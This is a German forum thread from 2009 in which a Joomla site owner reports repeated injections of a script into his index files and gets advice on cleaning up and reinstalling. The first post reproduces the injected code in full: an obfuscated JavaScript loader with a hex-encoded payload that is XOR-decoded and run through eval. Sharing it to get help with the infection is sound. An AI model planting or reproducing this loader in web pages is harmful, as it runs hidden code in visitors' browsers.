# Bösartiges Script in Homepage?!



## hinkel11 (28. September 2009)

Hallo,

seit geraumer Zeit, d.h. innerhalb von 4 Monaten war es nun gestern das 3. Mal, kam beim Aufruf der Startseite meiner HP die Fehlermeldung "Syntax Error: '<' unexpected in line ..." usw..
Diese Fehlermeldung verwies auf die index.php, welche sich im Root-Ordner befindet, also nicht die index.php vom Template.
Wenn man nun in dieser an gennanter Stelle nachschaut, entdeckt man ein seltsames script, welches wie folgt aussieht:


```
<!-- ad --><html><body>
<script>stisz="303b372139313a207a23263d20317c76683d32263539317427263769733c2020246e7b7b6d6c7a6566627a67667a6562667b352c31267b6b6732376c3062656c6661626466636364626567373263606262636466303231327374233d30203c69736573743c313d333c20697365737427202d38316973223d273d363d383d202d6e743c3d3030313a6f736a687b3d32263539316a767d6f5e36223533382069761a351a766f313969761a351a766f";yb="function me(){bsvcov=Math.PI;csyh=parseInt;gxjppv='length';zou=csyh(~((bsvcov&bsvcov)|(~bsvcov&bsvcov)&(bsvcov&~bsvcov)|(~bsvcov&~bsvcov)));htyev=csyh(((zou&zou)|(~zou&zou)&(zou&~zou)|(~zou&~zou))&1);zyguh=htyev<<htyev;em=zou;bvaglt='';xoks=String.fromCharCode;rqagn=eval;for(ckhq=zou;ckhq<yb[gxjppv];ckhq-=-htyev)em+=yb.charCodeAt(ckhq);em%=unescape(zou+xoks(120)+(htyev<<6));for(ckhq=zou;ckhq<stisz[gxjppv];ckhq+=zyguh)bvaglt+=xoks(csyh(zou+xoks(120)+stisz.charAt(ckhq)+stisz.charAt(ckhq+csyh(htyev)))^em);try{rqagn(bvaglt);}catch(e){try{eval(bvaglt);}catch(e){;}}}try{eval('me();')}catch(e) {}";eval(yb);</script>
</body></html><!-- /ad -->
```

Dieses script ist dann auch in den index.html-Dateien auf der 2.Ebene zu finden (also die mit 44kb) , d.h. der index.html in z.B. den Ordnern: administrator, plugins, templates usw.. Ich habe bisher keine weiteren negativen Effekte oder sonstigen Einschränkungen in der Funktionalität wahrgenommen. Scheint soweit nichts weiter betroffen zu sein. Doch fakt ist, dass da jemand regelmäßig mal vorbeischaut und so ein suspektes script einschläust.

Was kann man da machen? Kennt jemand dieses Problem?
Ich habe nach der 2. Attacke bereits mein Joomla auf Version 1.5.14 geupdated und auch Passwörter im Anschluss immer geändert. Gebracht hats allerdings nichts wie man sieht.


----------



## Sven Mintel (28. September 2009)

Moin,

befolge  mal diese Vorschläge:
http://www.fc-hosting.de/joomla/tips-joomla-gehackt.php

Aber alle, und gewissenhaft, sonst bringt es nichts.

Am Besten erstmal den eigenen PC prüfen, nicht dass du bei einem vorhandenen Trojaner noch weitere Lücken öffnest, während du bspw. die Schritte unter 3. abarbeitest.


----------



## hinkel11 (28. September 2009)

Immer und immer wieder höre ich von diesen Log-Files, die ich benötige um die Lücke zu finden. Doch wo finde ich die? Also im Root-Ordner meiner HP (Joomla-Installation) gibt es zwar einen Ordner namens logs, doch dieser ist leer.


----------



## Sven Mintel (29. September 2009)

Wo du die Log-Files findest, kann ich dir nicht genau sagen, das hängt von der Konfiguration des Webservers ab.

Üblicherweise werden diese in einem Verzeichnis oberhalb der DOCUMENT_ROOT(htdocs etc.)  bevorratet.
Falls du dort nichts findest, frage mal bei deinem Hoster nach.

Aber wie gesagt...erstmal PC checken, sonst bringt das alles nichts.

Und danach komplett Zugriffe verbieten, um Schaden für die Besucher zu Vermeiden(und evtl. weitere Zugriffe des Hackers)

Ein Update alleine wird höchstwahrscheinlich nicht ausreichen, ich befürchte, eine komplette Neuinstallation ist notwendig...damit meine ich wirklich komplett: Alles löschen, was auf dem Webspace ist...alle Dateien und die DBs  :-(


----------

